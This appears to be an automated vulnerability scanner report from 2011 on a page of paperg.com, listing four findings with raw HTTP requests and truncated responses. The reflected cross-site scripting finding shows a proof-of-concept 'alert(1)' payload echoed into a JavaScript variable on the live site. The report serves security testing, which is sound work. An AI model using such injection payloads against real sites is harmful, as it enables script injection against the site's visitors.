1. Cross-site scripting (reflected)
2. Cross-domain Referer leakage
3. HTML does not specify charset
4. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | http://www.paperg.com |
Path: | /jsfb/embed.php |
GET /jsfb/embed.php?pid=16509 Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://thesouthern.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 |
HTTP/1.1 200 OK Date: Mon, 13 Jun 2011 11:02:27 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT P3P: CP="CAO PSA OUR" Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 45319 Connection: Keep-alive Via: 1.1 AN-0016020122637050 var IMAGE_ROOT = 'http://www.paperg.com var flyerboard_root = 'http://www.paperg.com var remote_ip = '173.193.214.243'; var view = ''; var edit = '0'; var EMBED_URL395898743;alert(1)/ // links stylesheets in head function pg_linkss(filename) { var head = document.getElements ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperg.com |
Path: | /jsfb/embed.php |
GET /jsfb/embed.php?pid=16509 Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://thesouthern.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 |
HTTP/1.1 200 OK Date: Mon, 13 Jun 2011 11:01:20 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT P3P: CP="CAO PSA OUR" Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 46774 Connection: Keep-alive Via: 1.1 AN-0016020122637050 var IMAGE_ROOT = 'http://www.paperg.com var flyerboard_root = 'http://www.paperg.com var remote_ip = '173.193.214.243'; var view = ''; var edit = '0'; var EMBED_URL3958 = 'http://www. ...[SNIP]... <div class="options-fb-wrap"><a href="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperg.com |
Path: | /jsfb/embed.php |
GET /jsfb/embed.php?pid=16509 Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://thesouthern.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 |
HTTP/1.1 200 OK Date: Mon, 13 Jun 2011 11:01:20 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT P3P: CP="CAO PSA OUR" Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 46774 Connection: Keep-alive Via: 1.1 AN-0016020122637050 var IMAGE_ROOT = 'http://www.paperg.com var flyerboard_root = 'http://www.paperg.com var remote_ip = '173.193.214.243'; var view = ''; var edit = '0'; var EMBED_URL3958 = 'http://www. ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.paperg.com |
Path: | /jsfb/embed.php |
GET /jsfb/embed.php?pid=16509 Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://thesouthern.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 |
HTTP/1.1 200 OK Date: Mon, 13 Jun 2011 11:01:20 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT P3P: CP="CAO PSA OUR" Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 46774 Connection: Keep-alive Via: 1.1 AN-0016020122637050 var IMAGE_ROOT = 'http://www.paperg.com var flyerboard_root = 'http://www.paperg.com var remote_ip = '173.193.214.243'; var view = ''; var edit = '0'; var EMBED_URL3958 = 'http://www. ...[SNIP]... |